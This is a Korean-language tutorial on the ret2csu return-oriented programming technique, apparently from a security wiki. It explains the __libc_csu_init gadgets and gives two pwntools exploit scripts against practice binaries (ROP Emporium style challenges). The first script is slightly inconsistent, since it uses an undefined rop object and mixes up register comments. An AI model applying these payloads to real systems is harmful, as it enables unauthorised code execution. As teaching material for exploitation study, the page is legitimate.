Ret2csu

Reading time: 6 minutes

https://www.scs.stanford.edu/brop/bittau-brop.pdf기본 정보

ret2csu는 프로그램을 제어하려고 할 때 사용하는 해킹 기술로, 프로그램의 동작을 조작하는 데 일반적으로 사용하는 gadgets를 찾을 수 없을 때 사용됩니다.

프로그램이 특정 라이브러리(예: libc)를 사용할 때, 서로 다른 프로그램 조각들이 어떻게 상호작용하는지를 관리하기 위한 몇 가지 내장 함수가 있습니다. 이러한 함수 중에는 우리가 잃어버린 gadgets 역할을 할 수 있는 숨겨진 보석들이 있으며, 특히 __libc_csu_init이라는 함수가 있습니다.

__libc_csu_init의 마법의 Gadgets

**__libc_csu_init**에는 강조할 두 가지 명령어 시퀀스(gadgets)가 있습니다:

1. 첫 번째 시퀀스는 여러 레지스터(rbx, rbp, r12, r13, r14, r15)에 값을 설정할 수 있게 해줍니다. 이들은 나중에 사용하고 싶은 숫자나 주소를 저장할 수 있는 슬롯과 같습니다.

pop rbx;
pop rbp;
pop r12;
pop r13;
pop r14;
pop r15;
ret;

이 장치는 스택에서 값을 꺼내어 이러한 레지스터를 제어할 수 있게 해줍니다.

2. 두 번째 시퀀스는 우리가 설정한 값을 사용하여 몇 가지 작업을 수행합니다:

• 특정 값을 다른 레지스터로 이동시켜 함수의 매개변수로 사용할 준비를 합니다.
• r15와 rbx의 값을 더한 후 rbx에 8을 곱하여 결정된 위치로 호출을 수행합니다.

mov rdx, r15;
mov rsi, r14;
mov edi, r13d;
call qword [r12 + rbx*8];

3. 아마도 거기에 쓸 주소를 모를 것이고 ret 명령어가 필요합니다. 두 번째 가젯도 ret로 끝날 것이라는 점에 유의해야 하지만, 그것에 도달하기 위해서는 몇 가지 조건을 충족해야 합니다:

mov rdx, r15;
mov rsi, r14;
mov edi, r13d;
call qword [r12 + rbx*8];
add rbx, 0x1;
cmp rbp, rbx
jnz <func>
...
ret

조건은 다음과 같습니다:

• [r12 + rbx*8]는 호출 가능한 함수가 저장된 주소를 가리켜야 합니다 (아이디어가 없고 PIE가 없다면, 그냥 _init 함수를 사용할 수 있습니다):
• 만약 _init이 0x400560에 있다면, GEF를 사용하여 메모리에서 그것에 대한 포인터를 검색하고 [r12 + rbx*8]가 _init에 대한 포인터가 있는 주소가 되도록 하십시오:

# Example from https://guyinatuxedo.github.io/18-ret2_csu_dl/ropemporium_ret2csu/index.html
gef➤  search-pattern 0x400560
[+] Searching '\x60\x05\x40' in memory
[+] In '/Hackery/pod/modules/ret2_csu_dl/ropemporium_ret2csu/ret2csu'(0x400000-0x401000), permission=r-x
0x400e38 - 0x400e44  →   "\x60\x05\x40[...]"
[+] In '/Hackery/pod/modules/ret2_csu_dl/ropemporium_ret2csu/ret2csu'(0x600000-0x601000), permission=r--
0x600e38 - 0x600e44  →   "\x60\x05\x40[...]"

• rbp와 rbx는 점프를 피하기 위해 동일한 값을 가져야 합니다.
• 고려해야 할 생략된 pop이 있습니다.

RDI 및 RSI

ret2csu 가젯에서 **rdi**와 **rsi**를 제어하는 또 다른 방법은 특정 오프셋에 접근하는 것입니다:

자세한 정보는 이 페이지를 확인하세요:

BROP - Blind Return Oriented Programming

예시

호출 사용

syscall을 하거나 write()와 같은 함수를 호출하고 싶지만 rdx와 rsi 레지스터에 특정 값이 필요하다고 가정해 보겠습니다. 일반적으로 이러한 레지스터를 직접 설정하는 가젯을 찾지만, 찾을 수 없습니다.

여기서 ret2csu가 등장합니다:

1. 레지스터 설정: 첫 번째 매직 가젯을 사용하여 스택에서 값을 pop하여 rbx, rbp, r12 (edi), r13 (rsi), r14 (rdx), r15로 이동합니다.
2. 두 번째 가젯 사용: 이러한 레지스터가 설정되면 두 번째 가젯을 사용합니다. 이를 통해 선택한 값을 rdx와 rsi(각각 r14와 r13에서)로 이동시켜 함수 호출을 위한 매개변수를 준비합니다. 또한 r15와 rbx를 제어하여 프로그램이 계산한 주소에 있는 함수를 호출하도록 할 수 있습니다. 이 주소는 [r15 + rbx*8]에 배치됩니다.

이 기술을 사용한 예시와 설명이 여기에 있습니다, 그리고 이것이 사용된 최종 익스플로잇입니다:

from pwn import *

elf = context.binary = ELF('./vuln')
p = process()

POP_CHAIN = 0x00401224 # pop r12, r13, r14, r15, ret
REG_CALL = 0x00401208  # rdx, rsi, edi, call [r15 + rbx*8]
RW_LOC = 0x00404028

rop.raw('A' * 40)
rop.gets(RW_LOC)
rop.raw(POP_CHAIN)
rop.raw(0)                      # r12
rop.raw(0)                      # r13
rop.raw(0xdeadbeefcafed00d)     # r14 - popped into RDX!
rop.raw(RW_LOC)                 # r15 - holds location of called function!
rop.raw(REG_CALL)               # all the movs, plus the call

p.sendlineafter('me\n', rop.chain())
p.sendline(p64(elf.sym['win']))            # send to gets() so it's written
print(p.recvline())                        # should receive "Awesome work!"

호출 우회 및 ret 도달

다음 익스플로잇은 이 페이지에서 추출되었으며, 여기서 ret2csu가 사용되지만 호출을 사용하는 대신 비교를 우회하고 호출 후 ret에 도달합니다:

# Code from https://guyinatuxedo.github.io/18-ret2_csu_dl/ropemporium_ret2csu/index.html
# This exploit is based off of: https://www.rootnetsec.com/ropemporium-ret2csu/

from pwn import *

# Establish the target process
target = process('./ret2csu')
#gdb.attach(target, gdbscript = 'b *    0x4007b0')

# Our two __libc_csu_init rop gadgets
csuGadget0 = p64(0x40089a)
csuGadget1 = p64(0x400880)

# Address of ret2win and _init pointer
ret2win = p64(0x4007b1)
initPtr = p64(0x600e38)

# Padding from start of input to saved return address
payload = "0"*0x28

# Our first gadget, and the values to be popped from the stack

# Also a value of 0xf means it is a filler value
payload += csuGadget0
payload += p64(0x0) # RBX
payload += p64(0x1) # RBP
payload += initPtr # R12, will be called in `CALL qword ptr [R12 + RBX*0x8]`
payload += p64(0xf) # R13
payload += p64(0xf) # R14
payload += p64(0xdeadcafebabebeef) # R15 > soon to be RDX

# Our second gadget, and the corresponding stack values
payload += csuGadget1
payload += p64(0xf) # qword value for the ADD RSP, 0x8 adjustment
payload += p64(0xf) # RBX
payload += p64(0xf) # RBP
payload += p64(0xf) # R12
payload += p64(0xf) # R13
payload += p64(0xf) # R14
payload += p64(0xf) # R15

# Finally the address of ret2win
payload += ret2win

# Send the payload
target.sendline(payload)
target.interactive()

Why Not Just Use libc Directly?

보통 이러한 경우는 ret2plt + ret2lib에도 취약하지만, 때때로 libc에서 직접 찾은 가젯으로 쉽게 제어할 수 있는 것보다 더 많은 매개변수를 제어해야 할 필요가 있습니다. 예를 들어, write() 함수는 세 개의 매개변수를 필요로 하며, 이 모든 것을 직접 설정할 수 있는 가젯을 찾는 것은 불가능할 수 있습니다.